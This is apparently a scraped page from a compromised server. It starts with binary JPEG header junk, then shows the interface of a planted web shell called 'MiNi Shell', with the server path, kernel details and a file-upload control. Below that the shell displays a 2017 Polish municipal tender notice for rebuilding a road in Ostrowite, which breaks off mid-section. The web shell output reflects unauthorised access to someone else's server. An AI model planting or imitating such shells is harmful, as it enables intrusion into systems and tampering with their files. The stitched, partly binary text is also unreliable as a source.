JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170209/22470-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.ostrowite.samorzady.pl' target='_blank'>http://www.ostrowite.samorzady.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 22470 - 2017
              z dnia 2017-02-09 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ostrowite: Przebudowa drogi gminnej  Kania - Skrzynka<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Program Rozwoju Obszarów Wiejskich na lata 2014-2020</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Ostrowite, krajowy numer identyfikacyjny
              31101939000000, ul.
              ul. Lipowa 
              2,
              62402  
              Ostrowite, woj.
              wielkopolskie, państwo
              Polska, tel.
              632 765 121, e-mail
              ugmostrowite@post.pl, faks
              632 765 160.
              <br />
              Adres strony internetowej (URL): www.ostrowite.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />www.ostrowite.samorzady.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Składanie  ofert  odbywa się  za pośrednictwem opertora pocztowego w rozumieniu  ustwy z dnia 23 listopada 202r.-Prawo  pocztowe ( Dz.U. z016 poz. 1113 j.t. z póż. zm.), osobiście lub za pośrednictwem posłańca pod  adres: Urząd Gminy Ostrowite  ul. Lipowa 2, 62-402Ostrowite, sekretariat pokój 1poz. <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa drogi gminnej  Kania - Skrzynka<br /><b>Numer referencyjny: </b>GK.271.1.2017.PN<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiot  zamówienia   obejmuje   wykonanie  robót  polegających  na przebudowie  drogi  gminnej położonej na działkach  o numerach ewidencyjnych 87,107   obręb Kania ,
na działkach  o numerach  ewidencyjnych  34, 76, 61,22 obręb  Skrzynka  . 
Droga  o długości  1756,32 m o szerokości nawierzchni asfaltowej 4,5m  w granicach istniejącego pasa drogowego .
 Szczegółowy zakres  i sposób  wykonania przedmiotu Umowy  określają  następujące dokumenty; 
  1)  przedmiar robót, 
  2)   dokumentacja projektowa,
  3)  specyfikacja techniczna wykonania i odbioru robót budowlanych .   
 Wymagania w zakresie  równoważności :
1) Wszelkie nazwy własne produktów i  materiałów   przywołane w przedmiarach robót  służą   określeniu  pożądanego  standardu wykonania i  określeniu  właściwości i wymogów technicznych  założonych w dokumentacji  technicznej  dla danych  rozwiązań .
2) Wykonawca ma prawo zastosować rozwiązania własne, pod warunkiem, że  nie  zostanie obniżony  określony standard. Wprowadzone rozwiązania techniczne  i materiałowe nie mogą  pociągać za sobą  zwiększenia kosztów inwestycji.
3) W przypadku  złożenia  oferty  równoważnej  w celu oceny, czy oferta Wykonawcy jest równoważna  w  odniesieniu do rozwiązań  zaprojektowanych- do  oferty Wykonawca   musi załączyć  wszystkie  karty katalogowe, deklaracje zgodności,  aprobaty i atesty..  Rękojmia i  gwarancja 
Okres rękojmi:  36 miesięcy  , licząc od dnia podpisania protokołu odbioru końcowego robót budowlanych . 
Okres  gwarancji jakości  : na wykonane  roboty budowlane : minimum  36 miesięcy licząc   od dnia podpisania protokołu odbioru końcowego robót budowlanych. 
 Warunek zatrudnienie na podstawie  umowy o pracę osób  wykonujących wskazane przez Zamawiającego czynności  
1) Na podstawie art. 29 ust. 3a ustawy Pzp Zamawiający wymaga  zatrudnienia przez wykonawcę  lub podwykonawców na podstawie  umowy o pracę , osób  wykonujących wskazane niżej czynności  objęte przedmiotem zamówienia, w okresie realizacji  umowy:
- roboty przygotowawcze, rozbiórkowe i ziemne
- podbudowy
- nawierzchnie z  betonu asfaltowego
- roboty  uzupełniające i wykończeniowe
- organizacja ruchu.
2)  Sposób udokumentowania zatrudnienia osób , o  których mowa w art. 29 ust. 3a Pzp: 
- wykonawca  najpóźniej w  dniu   podpisania umowy  przedłoży Zamawiającemu  wykaz  osób wykonujących czynności  wymienione w pkt.4.3  wraz z   oświadczeniem, że osoby podane w wykazie  zatrudnione  są przez   wykonawcę lub  podwykonawcę  na podstawie umowy o pracę. W przypadku  wystąpienia zmian  dot. zatrudnienia   osób wykonujących wskazane przez  Zamawiającego, Wykonawca ma obowiązek najpóźniej  w dniu  rozpoczęcia  przez nie pracy na terenie  budowy zgłosić na piśmie tę  zmianę Zamawiającemu.
Warunkiem  do podpisania umowy  z Wykonawcą  będzie przedłożenie   Zamawiającemu , najpóźniej  w dniu podpisania umowy, wykazu , o którym mowa  wyżej   wg wzoru  stanowiącego załącznik nr 6  do Umowy.
3) Uprawnienia zamawiającego w zakresie kontroli spełniania  przez wykonawcę wymagań , o  których mowa w art. 29 ust. 3a. ustawy pzp.
Zamawiający  ma prawo do sprawdzenia   tożsamości  pracowników  wykonujących  wskazane  4.3 ppkt.1 czynności  oraz sprawdzenia godności   realizacji prac  przez  osoby wskazane w wykazie
 Informacje dodatkowe:
- roboty  będą prowadzone  w obiekcie liniowym czynnym.
- wybrany wykonawca  jest zobowiązany  do zawarcia   na własny koszt  ubezpieczenia robót  budowlanych   na kwotę nie niższą   niż  wartość wynagrodzenia  brutto określona   w formularzu oferty.
 W/w zakres  niniejszego zamówienia   wchodzi również :
1) organizacja i zagospodarowanie placu budowy wraz z zapleczem budowy, 
2) obsługa  geodezyjna  w tym  wykonanie  geodezyjnej  inwentaryzacji powykonawczej, 
3) Wykonanie czasowej organizacji ruchu drogowego  na czas  budowy zgodnie z obowiązującym  przepisami, 
 Wykonawca  jako wytwórca  odpadów w rozumieniu art. 3 ust. 3 pkt. 22 ustawy o odpadach  ma obowiązek zagospodarowania  ( wywozu i utylizacji) na własny koszt odpadów powstałych  podczas realizacji zadania, zgodnie z  obowiązującymi  przepisami. 

<br /><br /><b>II.5) Główny kod CPV: </b>45233000-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/07/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawcy są  ubezpieczeni od odpowiedzialności  cywilnej  w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia na  kwotę  nie mniejszą   niż  800.000,00 zł.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawcy, którzy wykonali nie wcześniej niż w  okresie ostatnich pięciu lat przed upływem terminu składania oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną odpowiadającą swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem jej rodzaju, wartości, daty, miejsca wykonania i podmiotu, na rzecz którego roboty te zostały wykonane oraz załączy dowody określające czy te roboty budowlane zostały wykonane należycie, w szczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. 
Przez jedną robotę budowlaną odpowiadającą swoim rodzajem przedmiotowi zamówienia należy rozumieć zamówienie spełniające łącznie następujące warunki: 
- wartość, co najmniej 800 000 PLN brutto, 
- wykonanie roboty budowlanej polegającej na budowie lub przebudowie drogi. 
Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że w wykonywaniu zamówienia uczestniczyć będzie minimum jedna osoba posiadająca uprawnienia budowlane niezbędne do wykonania przedmiotu zamówienia, ze wskazaniem zakresu wykonywanych przez nią czynności oraz informacją o podstawie dysponowania tą osobą. Wskazana osoba musi posiadać uprawnienia do kierowania robotami budowlanymi w specjalności drogowej, wykształcenie kierunkowe i co najmniej 3 letnie doświadczenie (licząc od dnia uzyskania uprawnień) na stanowisku kierownika. <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Zamawiający wymaga od wykonawców wskazania w ofercie imienia i nazwiska osoby, która będzie wykonywała czynności przy realizacji zamówienia jako kierownik budowy. 
Zamawiający dopuszcza posiadanie uprawnień odpowiadających wskazanym wyżej uprawnieniom budowlanym , wydanych na podstawie wcześniej obowiązujących przepisów prawa polskiego zgodnie z art. 104 ustawy z dnia 7 lipca 1994 r.- Prawo budowlane (tj. Dz. U. z 2016 r. poz. 290 z późn. zm.). 
Zgodnie z art. 104 ustawy z dnia 7 lipca 1994 r.- Prawo budowlane (tj. Dz. U. z 2016 r. poz. 290 z późn. zm.) osoby, które przed dniem wejścia w życie ustawy uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. 
Ponadto, zgodnie z art. 12a ustawy Prawo budowlane, samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych  lub   wydanych  obywatelom państw ,którzy  nabyli  uprawnienia  w: 
a)    innych niż  Rzeczypospolita Polska państwach  członkowskich  unii  Europejskiej ,
b)	państwach członkowskich Europejskiego  Porozumienia  o Wolnym  Handlu ( EFTA)- stronach  Umowy  o  Europejskim Obszarze  gospodarczym,
c)	Konfederacji szwajcarskiej zgodnie z  ustawą  z dnia 22 grudnia 2015 r o zasadach  uznawania kwalifikacji zawodowych nabytych   w państwach  członkowskich Unii Europejskiej ( Dz. U. Dz. U.2016 poz. 65 j.t.)  oraz  art.  20 a  ustawy  z dnia 15 grudnia 2000r o samorządach  zawodowych  architektów, inżynierów budownictwa oraz  urbanistów ( Dz.U.2014 poz. 1946 jednolity telst).

Wykonawca  może w celu  potwierdzenia  spełniania warunków  udziału w postępowaniu, w stosownych sytuacjach  polegać  na zdolnościach  technicznych lub zawodowych lub sytuacji  finansowej lub  ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących  go  z nim stosunków prawnych.
Wykonawca, który polega na zdolnościach  lub  sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował   zasobami  tych podmiotów, w szczególności  przedstawiając zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.W odniesieniu do warunków  dotyczących  wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te  zrealizują  roboty budowlane, do realizacji których te zdolności  są wymagane.
w takim przypadku zobowiązanie innego podmiotu powinno zawierać potwierdzenie uczestnictwa tego podmiotu w  wykonaniu zamówienia jako podwykonawcy.
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"> W celu wykazania braku postaw  do wykluczenia z postępowania   o  udzielenie zamówienia  , wykonawca przedłoży  odpis  z właściwego rejestru lub z  centralnej  ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w  celu potwierdzenia  braku podstaw   wykluczenia  na podstawie  art. 24 ust.5 pkt.1  ustawy.
 </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />  W  celu  potwierdzenia  spełniania  przez wykonawcę  warunków  udziału w  postępowaniu  dotyczących sytuacji  ekonomicznej i  finansowej, Wykonawca przedłoży  dokument potwierdzający, że wykonawca  jest  ubezpieczony od  odpowiedzialności  cywilnej w zakresie  prowadzonej działalności związanej z przedmiotem  zamówienia   na sumę  gwarancyjną co najmniej  800.000,00 zł. Wykonawca  powinien załączyć  dowody  opłacenia składek, które  stały się wymagalne do dnia  upływu terminu składania  ofert.
 W  celu  potwierdzenia  spełniania  przez wykonawcę  warunków  udziału w  postępowaniu  dotyczących zdolności technicznej  lub zawodowej, wykonawca przedłoży:   wykaz  robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat  przed  upływem  terminu składania   ofert, a jeżeli okres prowadzenia  działalności jest  krótszy- w tym okresie, wraz  z podaniem ich  rodzaju, wartości, daty, miejsca wykonania   i podmiotów, na rzecz których roboty te zostały wykonane ,
2) dowody określające czy te roboty budowlane zostały wykonane  należycie , szczególności  informacje o tym  czy roboty zostały  wykonane  zgodnie z przepisami  prawa  budowlanego i prawidłowo ukończone, przy  czym dowodami  których mowa, są  referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego  roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym  charakterze wykonawca  nie  jest w stanie uzyskać tych dokumentów- inne  dokumenty,
Potwierdzeniem warunku, o którym  mowa w pkt. 7.2 ppkt.2, tiret 1 będzie  wykazanie  w wykazie  ( Załącznik nr 5) wykonanej nie wcześnie niż w  okresie  ostatnich 5 lat przed  upływem terminu składania  ofert, a  jeżeli okres prowadzenia działalności  jest  krótszy  w tym okresie, co najmniej jednej  roboty budowlanej należycie, zgodnie z przepisami  prawa  budowlanego i prawidłowo ukończonej  spełniającej następujące warunki;
a.	na kwotę  co najmniej  800.000,00 ( w ramach jednej inwestycji budowlanej)
b.	wykonanie roboty budowlanej polegającej na  budowie lub przebudowie  drogi.
oraz  przedłożeniem odpowiednich dowodów
Wykaz  osób,  skierowanych  przez wykonawcę  do realizacji zamówienia publicznego, szczególności  odpowiedzialnych  za kierowanie  robotami budowlanymi , wraz z  informacjami  na temat ich  kwalifikacji zawodowych, uprawnień , a  także  zakresu wykonywanych przez  nie  czynności oraz  informacją o podstawie do dysponowania  tymi osobami.
Potwierdzeniem warunku, o którym  mowa w pkt. 7.2 ppkt.2, tiret 2 będzie  wykazanie  w wykazie osób (Załącznik nr 6 ), które będą  uczestniczyć w wykonaniu zamówienia, posiadających  uprawnienia  budowlanego pełnienia  samodzielnych  funkcji technicznych w  budownictwie zgodnie  z  Rozporządzeniem Ministra Transportu i Budownictwa z dnia 11.09.2014r w sprawie  samodzielnych funkcji  technicznych w budownictwie ( Dz. U z 2014 poz. 1278), tj.. co  najmniej:
a)	1 osobę posiadającą  aktualne uprawnienia do  kierowania  robotami  w specjalności drogowej, wykształcenie kierunkowe i co najmniej 3 letnie doświadczenie (licząc od dnia uzyskania uprawnień) na stanowisku kierownika. Zamawiający wymaga od wykonawców wskazania w ofercie imienia i nazwiska osoby.
Wykonawca powinien załączyć , w terminie 3 dni od zamieszczenia na stronie internetowej Zamawiającego informacji, o której mowa w art. 86 ust. 5 ustawy, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, w przypadku  przynależności  do tej  samej grupy  kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty  bądź informacje  potwierdzające, że powiązania  z innym wykonawcą  nie prowadzą  do  zakłócenia  konkurencji  w  postępowaniu.
W  rozumieniu ustawy z dnia 16.02.2007 r. o ochronie  konkurencji i konsumentów ( Dz. U. 2015 poz. 184 jednolity tekst z późn. zm.) za grupę  kapitałowa  uważa się wszystkich przedsiębiorców , którzy są kontrolowani w sposób  bezpośredni lub pośredni przez jednego przedsiębiorcę, w tym  również  tego przedsiębiorcę  wzór oświadczenia o przynależności do grupy  kapitałowej stanowi załącznik nr 6 do SIWZ.
Zamawiający  przed  udzieleniem zamówienia   wezwie  Wykonawcę, którego oferta została  najwyżej  oceniona, do złożenia  w wyznaczonym nie  krótszym niż 5 dni, terminie aktualnych na dzień  złożenia  ofert następujących dokumentów, o  których mowa w pkt.11 -14.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
